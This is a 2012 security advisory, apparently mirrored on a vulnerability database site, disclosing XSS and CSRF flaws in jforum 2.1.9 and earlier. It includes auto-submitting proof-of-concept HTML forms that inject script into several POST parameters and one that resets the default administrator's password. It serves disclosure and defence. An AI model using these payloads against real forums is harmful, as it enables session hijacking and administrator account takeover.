Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23134
HistoryDec 26, 2012 - 12:00 a.m.

Multiple Vulnerabilities in jforum

2012-12-2600:00:00
High-Tech Bridge
www.htbridge.com
17
JSON

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jforum, which can be exploited to perform Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks.

  1. Multiple Cross-Site scripting (XSS) vulnerabilities in jforum: CVE-2012-6445
    1.1 The vulnerability exists due to insufficient filtration of user-supplied input in “start” HTTP POST parameter in “jforum.page” script when sending any message. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in user’s browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.
    Malicious webpage example:
    <form action=“http://[host]/jforum.page” method=“post” name=“f1”>
    <input type=“hidden” name=“action” value=“insertSave” />
    <input type=“hidden” name=“module” value=“posts” />
    <input type=“hidden” name=“preview” value=“0”/>
    <input type=“hidden” name=“forum_id” value=“1” />
    <input type=“hidden” name=“start” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“hidden” name=“topic_id” value=“2” />
    <input type=“submit” id=“btn”>
    </form>
    <script>
    document.f1.submit();
    </script>
    1.2 The vulnerability exists due to insufficient filtration of user-supplied input in “action” HTTP POST parameter in “jforum.page” script when posting a reply. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in user’s browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.
    Malicious webpage example:
    <form action=“http://[host]/jforum.page” method=“post” name=“f1”>
    <input type=“hidden” name=“module” value=“posts” />
    <input type=“hidden” name=“disable_html” value=“1” />
    <input type=“hidden” name=“forum_id” value=“1” />
    <input type=“hidden” name=“message” value=“123” />
    <input type=“hidden” name=“quick” value=“1” />
    <input type=“hidden” name=“start” value=“0” />
    <input type=“hidden” name=“topic_id” value=“2” />
    <input type=“hidden” name=“action” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“submit” id=“btn”>
    </form>
    <script>
    document.f1.submit();
    </script>
    1.3 The vulnerability exists due insufficient filtration of user-supplied input in “returnUrl”, “forum_id” and “topic_id” HTTP POST parameters in “jforum.page” script. A remote attacker can create a specially crafted webpage and execute arbitrary HTML and script code in administrator’s browser in the context of vulnerable website. Successful exploitation requires that victim visits the malicious webpage.
    Malicious webpage example:
    <form action=“http://[host]/jforum.page” method=“post"name=“f1” >
    <input type=“hidden” name=“action” value=“doModeration” />
    <input type=“hidden” name=“log_description” value=”" />
    <input type=“hidden” name=“log_type” value=“0” />
    <input type=“hidden” name=“module” value=“moderation” />
    <input type=“hidden” name=“topicMove” value=“1” />
    <input type=“hidden” name=“returnUrl” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“hidden” name=“forum_id” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“hidden” name=“topic_id” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“submit” id=“btn”>
    <script>
    document.f1.submit();
    </script>
    </form>

  2. Сross-Site Request Forgery (CSRF) in jforum: CVE-2012-6446
    2.1 The vulnerability exists due to insufficient verification of the HTTP request origin in “jforum.page” script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator’s password.
    PoC (Proof-of-Concept) below will change password to “password” for user with id = 2 (default administrator’s ID):
    <form action=“http://[host]/jforum.page” method=“post” name=“f1”>
    <input type=“hidden” name=“action” value=“editSave” />
    <input type=“hidden” name=“module” value=“adminUsers” />
    <input type=“hidden” name=“user_id” value=“2” />
    <input type=“hidden” name=“username” value=“username” />
    <input type=“hidden” name=“email” value="[email protected]" />
    <input type=“hidden” name=“new_password” value=“password” />
    <input type=“hidden” name=“password_confirm” value=“password” />
    <input type=“hidden” name=“viewemail” value=“0” />
    <input type=“hidden” name=“hideonline” value=“0” />
    <input type=“hidden” name=“notifyreply” value=“1” />
    <input type=“hidden” name=“notify_always” value=“0” />
    <input type=“hidden” name=“notify_text” value=“0” />
    <input type=“hidden” name=“notifypm” value=“1” />
    <input type=“hidden” name=“attachsig” value=“1” />
    <input type=“hidden” name=“allowhtml” value=“1” />
    <input type=“hidden” name=“allowbbcode” value=“1” />
    <input type=“hidden” name=“allowsmilies” value=“1” />
    <input type=“hidden” name=“rank_special” value=“-1” />
    <input type=“submit” name=“submit” value=“Submit”>
    </form>
    <script>
    document.f1.submit();
    </script>

CPENameOperatorVersion
jforumle2.1.9

Related

securityvulns 1
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2013-02-18 00:00:00
JSON
Related for HTB23134
securityvulns1